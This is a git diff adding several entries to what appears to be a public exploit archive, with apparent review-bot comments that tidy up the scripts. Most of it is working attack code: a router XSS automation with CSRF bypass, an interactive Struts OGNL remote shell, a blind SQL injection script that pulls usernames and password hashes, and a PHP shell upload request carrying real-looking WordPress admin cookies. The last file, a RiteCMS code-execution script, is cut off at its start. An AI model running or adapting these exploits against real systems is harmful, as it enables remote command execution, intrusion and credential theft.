diff --git a/exploits/hardware/webapps/48908.py b/exploits/hardware/webapps/48908.py
new file mode 100755
index 000000000..9f5e83f07
--- /dev/null
+++ b/exploits/hardware/webapps/48908.py
@@ -0,0 +1,274 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+"""
+Exploit Title: Persistent XSS on Comtrend AR-5387un router
+Date: 19/10/2020
+Exploit Author: OscarAkaElvis
+Vendor Homepage: https://www.comtrend.com/
+Version: Comtrend AR-5387un router
+Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i
+CVE: CVE-2018-8062
+
+Disclosure timeline:
+08/03/2018: Vulnerability was discovered
+10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062)
+11/03/2018: Mitre answered, CVE number reserved
+11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered
+16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233)
+18/10/2020: Exploit creation
+19/10/2020: Exploit sent to exploit-db
+
+Exploitation explanation:
+To exploit this vulnerability, once logged into the router, a WAN service must be created
+Click on "Advanced Setup", "WAN Service". "Add button", "Next"
+Then insert the payload into the "Enter Service Description" field. This was used for the PoC
+Then click on "Next" four times to go on through the steps and finally click on "Apply/Save"
+The result of the XSS will be displayed and triggered on the WAN services page
+
+This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload
+Happy hacking :)
+OscarAkaElvis - https://twitter.com/OscarAkaElvis
+"""
+
+# Dependencies and libraries
+import requests
+from requests.auth import HTTPBasicAuth
+import re
+from sys import argv, exit
+import argparse
+from os import path
+from time import sleep
+
+
+class Exploit(object):
+
+ # Global class vars
+ session = requests.Session()
+ user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36"
+ ip = None
+ username = None
+ password = None
+ payload = None
+ default_ip = "192.168.1.1"
+ default_username = "admin"
+ default_password = "admin"
+ default_payload = ""
+ exploit_version = "1.0"
+ current_sessionkey = None
+ referer_sessionkey = None
+
+ script_name = path.basename(argv[0])
+ description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router'
+ epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'\''
+
+ def start_msg(self):
+ print("[*] Starting CVE-2018-8062 exploit...")
+ sleep(0.5)
+
+ def check_params(self, arguments):
+ parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text)
+ parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP')
+ parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME')
+ parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD')
+ parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD')
+ parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit")
+
+ args = parser.parse_args(arguments)
+
+ self.start_msg()
+
+ print("[*] Launch the exploit using -h argument to check all the available options")
+ print()
+
+ if not args.ip:
+ self.ip = self.default_ip
+ print("[!] Warning, no ip set, default will be used: " + str(self.ip))
+ else:
+ self.ip = args.ip
+
+ if not args.username:
+ self.username = self.default_username
+ print("[!] Warning, no username set, default will be used: " + str(self.username))
+ else:
+ self.username = args.username
+
+ if not args.password:
+ self.password = self.default_password
+ print("[!] Warning, no password set, default will be used: " + str(self.password))
+ else:
+ self.password = args.password
+
+ if not args.payload:
+ self.payload = self.default_payload
+ print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload))
+ else:
+ self.password = args.password
+
+ def print_version(self):
+ print()
+ return 'v{}'.format(self.exploit_version)
+
+ def check_router(self):
+ try:
+ print()
+ print("[*] Trying to detect router...")
+
+ headers = {"User-Agent": self.user_agent}
+ response = self.session.get("http://" + str(self.ip) + "/", headers=headers)
+
+ if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)):
+ print("[+] Comtrend router detected successfully")
+ else:
+ print()
+ print("[-] It seems the target is not a Comtrend router")
+ print("[*] Exiting...")
+ exit(1)
+ except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError):
+ print()
+ print("[-] Can't connect to the router")
+ print("[*] Exiting...")
+ exit(1)
+
+ def check_login(self):
+ print()
+ print("[*] Trying to login...")
+
+ headers = {"User-Agent": self.user_agent}
+ response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ if response.status_code != 401:
+ print("[+] Login successfully!")
+ sleep(1)
+ else:
+ print()
+ print("[-] Can't login into the router. Check your creds!")
+ print("[*] Exiting...")
+ exit(1)
+
+ def get_sessionKey(self, response_text):
+ sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text))
+
+ if sessionKey is not None:
+ sessionKey = sessionKey.group(1)
+ else:
+ sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE)
+ if sessionKey is not None:
+ sessionKey = sessionKey.group(1)
+
+ return sessionKey
+
+ def step1(self):
+ print()
+ print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...")
+
+ headers = {"User-Agent": self.user_agent}
+ response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ print("[+] Success! Initial sessionKey: " + self.current_sessionkey)
+ sleep(1)
+
+ def step2(self):
+ print()
+ print("[*] Performing step 2/8...")
+
+ paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"}
+ response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def step3(self):
+ print()
+ print("[*] Performing step 3/8...")
+
+ paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey}
+ response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def step4(self):
+ print()
+ print("[*] Performing step 4/8...")
+
+ paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey}
+ response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def step5(self):
+ print()
+ print("[*] Performing step 5/8...")
+
+ paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey}
+ response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def step6(self):
+ print()
+ print("[*] Performing step 6/8...")
+
+ paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey}
+ response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def step7(self):
+ print()
+ print("[*] Performing step 7/8...")
+
+ paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey}
+ response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ self.referer_sessionkey = self.current_sessionkey
+ self.current_sessionkey = self.get_sessionKey(response.content)
+ sleep(1)
+
+ def final_step8(self):
+ print()
+ print("[*] Performing final step 8/8. Deploying XSS payload...")
+
+ paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"}
+ headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey}
+ self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+ print()
+ print("[+] XSS payload deployed successfully")
+ print("[+] Happy hacking :) . Author: OscarAkaElvis")
+
+ @staticmethod
+ def main(self, arguments):
+ self.check_params(arguments)
+ self.check_router()
+ self.check_login()
+ self.step1()
+ self.step2()
+ self.step3()
+ self.step4()
+ self.step5()
+ self.step6()
+ self.step7()
+ self.final_step8()
+ exit(0)
+
+
+if __name__ == '__main__':
+ ImportObject = Exploit()
+ ImportObject.main(ImportObject, argv[1:])
\ No newline at end of file
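Review bot: `get_sessionKey` returns None when neither regex matches, and the callers use the result unchecked: `step1` concatenates it into its success message and steps 3 to 8 concatenate `self.referer_sessionkey` into the Referer header, so an unexpected response ends in a TypeError part-way through a sequence of configuration requests. A guard after each lookup, for example `if self.current_sessionkey is None: print("[-] No sessionKey in response"); exit(1)`, would stop the run cleanly. None of the `self.session.get(...)` calls passes `timeout=`, so an unresponsive device blocks the script indefinitely. The module docstring should also state that the run leaves a new WAN service entry on the device (step 8 sends `action=add`), which has to be removed by hand after a lab test.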
diff --git a/exploits/java/webapps/48917.py b/exploits/java/webapps/48917.py
new file mode 100755
index 000000000..06d3357a0
--- /dev/null
+++ b/exploits/java/webapps/48917.py
@@ -0,0 +1,79 @@
+# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
+# Google Dork: ext:action | filetype:action
+# Date: 2020/09/09
+# Exploit Author: Jonatas Fil
+# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html
+# Version: <= 2.3.15
+# Tested on: Linux
+# CVE : CVE-2013-2251
+
+#!/usr/bin/python
+#
+# coding=utf-8
+#
+# Struts 2 DefaultActionMapper Exploit [S2-016]
+# Interactive Shell for CVE-2013-2251
+#
+# The Struts 2 DefaultActionMapper supports a method for short-circuit
+navigation state changes by prefixing parameters with
+# "action:" or "redirect:", followed by a desired navigational target
+expression. This mechanism was intended to help with
+# attaching navigational information to buttons within forms.
+#
+# https://struts.apache.org/docs/s2-016.html
+# Jonatas Fil (@exploitation)
+
+import requests
+import sys
+import readline
+
+
+# Disable SSL
+requests.packages.urllib3.disable_warnings()
+
+# ShellEvil
+if len(sys.argv) == 2:
+ target = sys.argv[1] # Payload
+ first = target +
+"?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','"
+ second =
+"'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
+ loop = 1
+ while loop == 1:
+ cmd = raw_input("$ ")
+ while cmd.strip() == '':
+ cmd = raw_input("$ ")
+ if cmd.strip() == '\q':
+ print("Exiting...")
+ sys.exit()
+ try:
+ headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"}
+ pwn=requests.get(first+cmd+second,headers =
+headers,verify=False) # Disable SSL
+ if pwn.status_code == 200:
+ print pwn.content # 1337
+ else:
+ print("Not Vuln !")
+ sys.exit()
+ except Exception,e:
+ print e
+ print("Exiting...")
+ sys.exit()
+
+else: # BANNER
+ print('''
+ __ _ _ _ __ _ _
+/ _\ |__ ___| | | /__\_ _(_) |
+\ \| '_ \ / _ \ | |/_\ \ \ / / | |
+_\ \ | | | __/ | //__ \ V /| | |
+\__/_| |_|\___|_|_\__/ \_/ |_|_|
+
+ by Jonatas Fil [@explotation]
+''')
+ print("======================================================")
+ print("# Struts 2 DefaultActionMapper Exploit [S2-016] #")
+ print("# USO: python struts.py http://site.com:8080/xxx.action #")
+ print("======================================================")
+ print("bye")
+ sys.exit()
\ No newline at end of file
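Review bot: The two `# Disable SSL` comments, on `requests.packages.urllib3.disable_warnings()` and on the `verify=False` request, misdescribe the code: TLS is still used, only certificate validation and the warning about it are switched off. Suggested wording: `# Suppress urllib3's InsecureRequestWarning` and `# verify=False: the server certificate is not validated`. The header gives only the affected range (`Version: <= 2.3.15`); a line pointing readers to the S2-016 bulletin for the fixed release would make the entry usable for patch verification. It should also say that the script is Python 2 only (`raw_input`, `print pwn.content`, `except Exception,e`), since the `#!/usr/bin/python` line sits below the header comments and does not act as a shebang.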
diff --git a/exploits/multiple/webapps/48919.txt b/exploits/multiple/webapps/48919.txt
new file mode 100644
index 000000000..050088766
--- /dev/null
+++ b/exploits/multiple/webapps/48919.txt
@@ -0,0 +1,32 @@
+# Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability (Authenticated)
+# Date: 10.8.2020.
+# Exploit Author: n1x_ [MS-WEB]
+# Software Homepage: https://wordpress.org/plugins/wp-colorbox/
+# Software Link (v1.1.1): https://downloads.wordpress.org/plugin/wp-colorbox.1.1.1.zip
+# Product Version: 1.1.1
+
+[Description]
+
+# WordPress Colorbox plugin is a simple lightbox tool for WordPress. It allows users to pop up content in lightbox using the popular jQuery ColorBox library.
+
+# Due to improper input santitization of "hyperlink" field, of the plugin shortcode, version v1.1.1 (and possibly previous versions), are affected by a stored XSS vulnerability.
+
+[Proof of Concept]
+
+# 1. Authorization as user with privileges to write and publish posts
+# 2. Injecting code into "hyperlink" field of the plugin shorthocode, and publishing the post
+# 3. The code is stored on the post
+
+
+[Example payloads]
+
+
+# Example payload 1: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink=""]
+
+# Example payload 2: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink=""]
+
+[Response]
+
+...
+
+...
\ No newline at end of file
diff --git a/exploits/php/webapps/48909.txt b/exploits/php/webapps/48909.txt
new file mode 100644
index 000000000..1a613fafa
--- /dev/null
+++ b/exploits/php/webapps/48909.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)
+# Google Dork: N/A
+# Date: 2020/10/19
+# Exploit Author: Akıner Kısa
+# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip
+# Version: 1.0
+# Tested on: XAMPP
+# CVE : N/A
+
+Vulnerable Pages:
+
+http://localhost/loan/index.php?page=loans
+http://localhost/loan/index.php?page=payments
+http://localhost/loan/index.php?page=borrowers
+http://localhost/loan/index.php?page=loan_type
+
+Proof of Concept:
+
+1 - Go to vulnerable pages and using edit button (in the right, action column).
+
+2 - And fill the blanks with "" payload.
\ No newline at end of file
diff --git a/exploits/php/webapps/48910.txt b/exploits/php/webapps/48910.txt
new file mode 100644
index 000000000..ba43480b7
--- /dev/null
+++ b/exploits/php/webapps/48910.txt
@@ -0,0 +1,15 @@
+# Exploit Title: WP Courses < 2.0.29 - Broken Access Controls leading to
+Courses Content Disclosure
+# Exploit Author: Stefan Broeder, Marco Ortisi (redtimmysec)
+# Authors blog: https://www.redtimmy.com
+# Vendor Homepage: https://wpcoursesplugin.com/
+# Version Vulnerable: < 2.0.29
+# CVE: (requested but not assigned yet)
+
+WP Courses plugin < 2.0.29 does not protect the courses which could be
+accessed by unauthenticated users using the REST API (/wp-jon/)
+endpoints (for example /wp-json/wp/v2/lesson/{lesson_id}) This could
+result in attackers accessing paying content without authorization.
+
+Full story here:
+https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
\ No newline at end of file
diff --git a/exploits/php/webapps/48911.txt b/exploits/php/webapps/48911.txt
new file mode 100644
index 000000000..24ba0783b
--- /dev/null
+++ b/exploits/php/webapps/48911.txt
@@ -0,0 +1,41 @@
+# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection
+# Exploit Author: Rahul Ramkumar
+# Date: 2020-09-16
+# Vendor Homepage: https://projectworlds.in
+# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip
+# Version: 1.0
+# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
+# CVE: CVE-2020-25760
+# Description
+The file front.php does not perform input validation on the 'rid' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database.
+Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how.
+
+#POC
+
+1) Navigate to the login page
+
+Example:
+
+http://192.168.1.72/visitor_management/index.php
+
+2) Enter 'username' and 'password'
+
+3) On the homepage, click on any visitor name and intercept the request
+
+4) Save the request to file. Example, visitor_management_sqli.req
+
+GET /visitor_management/front.php?rid=373568 HTTP/1.1
+Host: 192.168.1.72
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Referer: http://192.168.1.72/visitor_management/front.php
+Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef
+Upgrade-Insecure-Requests: 1
+
+5) Run SQLmap on the file,
+
+sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10
\ No newline at end of file
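Review bot: The captured request includes a session identifier on the `Cookie: PHPSESSID=…` line; session tokens should be replaced with a placeholder such as `Cookie: PHPSESSID=<redacted>` before the file is committed, even when the host is a lab address. The same applies to the `Cookie:` line of the sample request in exploits/php/webapps/48913.txt, which carries `wordpress_…` and `wordpress_logged_in_…` authentication cookies for the `admin` user. The description would also be more useful to defenders with one line on remediation, for example that `rid` should be bound through a parameterized query in front.php.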
diff --git a/exploits/php/webapps/48912.py b/exploits/php/webapps/48912.py
new file mode 100755
index 000000000..008ad84e6
--- /dev/null
+++ b/exploits/php/webapps/48912.py
@@ -0,0 +1,103 @@
+# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
+# Date: 2020-16-09
+# Exploit Author: nag0mez
+# Vendor Homepage: https://ultimatepro.codexcube.com/
+# Version: <= 2.0.5
+# Tested on: Kali Linux 2020.2
+
+
+# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.
+
+#!/usr/bin/env python3
+#-*- coding: utf-8 -*-
+import requests
+import sys
+
+# The original vulnerability was found on a server with an invalid SSL certificate,
+# which Python could not verify. I added the verify=False parameter to avoid SSL check.
+# The lack of verification results in a warning message from Python.
+# To get a clean output, we will ignore all warnings.
+import warnings
+warnings.filterwarnings("ignore")
+
+host = 'https://testurl.test' # Change
+url = "{}/frontend/get_article_suggestion/".format(host)
+
+chars = '1234567890abcdefghijklmnopqrstuvwxyz'
+hex_chars = 'abcdef1234567890'
+
+def send_payload(payload):
+ try:
+ response = requests.post(url, data=payload, verify=False)
+ content = response.text
+ length = len(content)
+ return length
+ except Exception as e:
+ print('Cannot connect to host. Exit.')
+ sys.exit(1)
+
+
+def get_first_user():
+ found = True
+ known = ''
+
+ while found:
+
+ found = False
+ for c in chars:
+ test = known + c
+ payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}
+ length = send_payload(payload)
+
+ if length > 2:
+ found = True
+ known += c
+ print(c, end='')
+ sys.stdout.flush()
+ break
+
+ return known
+
+def get_hash(username):
+ found = True
+ known = ''
+
+ while found:
+
+ found = False
+ for c in hex_chars:
+ test = known + c
+ payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}
+ length = send_payload(payload)
+
+ if length > 2:
+ found = True
+ known += c
+ print(c, end='')
+ sys.stdout.flush()
+ break
+
+ return known
+
+
+if __name__ == '__main__':
+ print('Exploit started.')
+ print('Guessing username...')
+
+ username = get_first_user()
+
+ if username != '':
+ print('\nUsername found: {}'.format(username))
+ else:
+ print('\nCould not get username! Exit.')
+ sys.exit(1)
+
+ print('Guessing password SHA512 hash...')
+
+ sha = get_hash(username)
+
+ if sha != '':
+ print('\nHash found: {}'.format(sha))
+ else:
+ print('\nCould not get Hash! Exit.')
+ sys.exit(1)
\ No newline at end of file
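Review bot: `warnings.filterwarnings("ignore")` silences every warning in the process, not only the certificate warning that the comment above it describes, and `send_payload` catches bare `Exception` and reports any failure as 'Cannot connect to host', which hides the real error. Both can be narrowed: `requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)` in place of the blanket filter, and `except requests.exceptions.RequestException as e:` with `e` included in the printed message. The `length > 2` test in `get_first_user` and `get_hash` is an undocumented magic number; a comment such as `# a response body longer than 2 characters is treated as a match` would state the assumption the loop relies on.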
diff --git a/exploits/php/webapps/48913.txt b/exploits/php/webapps/48913.txt
new file mode 100644
index 000000000..b157ee8a3
--- /dev/null
+++ b/exploits/php/webapps/48913.txt
@@ -0,0 +1,67 @@
+# Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload
+# Date: 2020-10-20
+# Exploit Author: Net-Hunter
+# Google Dork: N/A
+# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/
+# Vendor Homepage: https://www.heliossolutions.co/
+# Tested on: Linux Apache / Wordpress 5.5.1
+# Version: 2.1
+
+
+.:: Description ::.
+An Authenticated User Can Bypass Uploader of the Plugin and Upload Arbitary File
+Because the extension of the Uploaded Flie is Checked on Client Side
+
+.:: Vulnerable File ::.
+/wp-admin/admin.php?page=hs-brand-logo-slider.php
+
+.:: Vulnerable Code ::.
+Content-Disposition: form-data; name="logoupload"; filename="a.php"
+Content-Type: image/jpeg
+
+
+.:: Proof Of Concept (Poc) ::.
+Step 1 - Log in to your account , Select hs-brand-logo-slider from the menu
+Upload
+Step 2 - Stop the upload request with burp suite
+Step 3 - Rename the file, for example a.jpg to a.php
+Step 4 - Your shell has been uploaded, showing the file path in the table
+
+.:: Sample Request::.
+
+POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1
+Host: 172.16.1.17:81
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php
+Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227
+Content-Length: 81765
+Origin: http://172.16.1.17:81
+Connection: close
+Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907
+Upgrade-Insecure-Requests: 1
+
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="brandname"
+
+aaa
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php"
+Content-Type: image/jpeg
+
+
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="logourl"
+
+http://aa.com
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="sortorder"
+
+1
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="submit_data"
+
+Submit
+-----------------------------407602771734524910834293111227--
\ No newline at end of file
diff --git a/exploits/php/webapps/48914.txt b/exploits/php/webapps/48914.txt
new file mode 100644
index 000000000..a7e0b124b
--- /dev/null
+++ b/exploits/php/webapps/48914.txt
@@ -0,0 +1,27 @@
+# Exploit Title: User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS
+# Google Dork: N/A
+# Date: 2020-08-07
+# Exploit Author: yusufmalikul
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 2.1
+# Tested on: Windows 10
+# CVE : N/A
+
+Description
+
+User Registration & Login and User Management System With admin panel 2.1 application from PHPgurukul is vulnerable to
+Persistent XSS via the fname, lname, email, and contact field name when user register on the site then admin viewing user
+list on manage user page triggering the payload.
+
+POC
+
+User side
+1. Go to the user registration page http://localhost/loginsystem
+2. Enter in one of the field (first name, last name, email, or contact)
+3. Click sign up
+
+Admin side
+1. Login to admin panel http://localhost/loginsystem/admin
+2. After login successful it will redirect to manage user page
+3. Payload triggered
\ No newline at end of file
diff --git a/exploits/php/webapps/48915.py b/exploits/php/webapps/48915.py
new file mode 100755
index 000000000..ed1c5db09
--- /dev/null
+++ b/exploits/php/webapps/48915.py
@@ -0,0 +1,129 @@
+# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
+# Date: 2020-07-03
+# Exploit Author: H0j3n
+# Vendor Homepage: http://ritecms.com/
+# Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download
+# Version: 2.2.1
+# Tested on: Linux
+# Reference: https://www.exploit-db.com/exploits/48636
+
+# !/usr/bin/python
+# coding=utf-8
+import requests,sys,base64,os
+from colorama import Fore, Back, Style
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+# Variable
+CONTENT = '''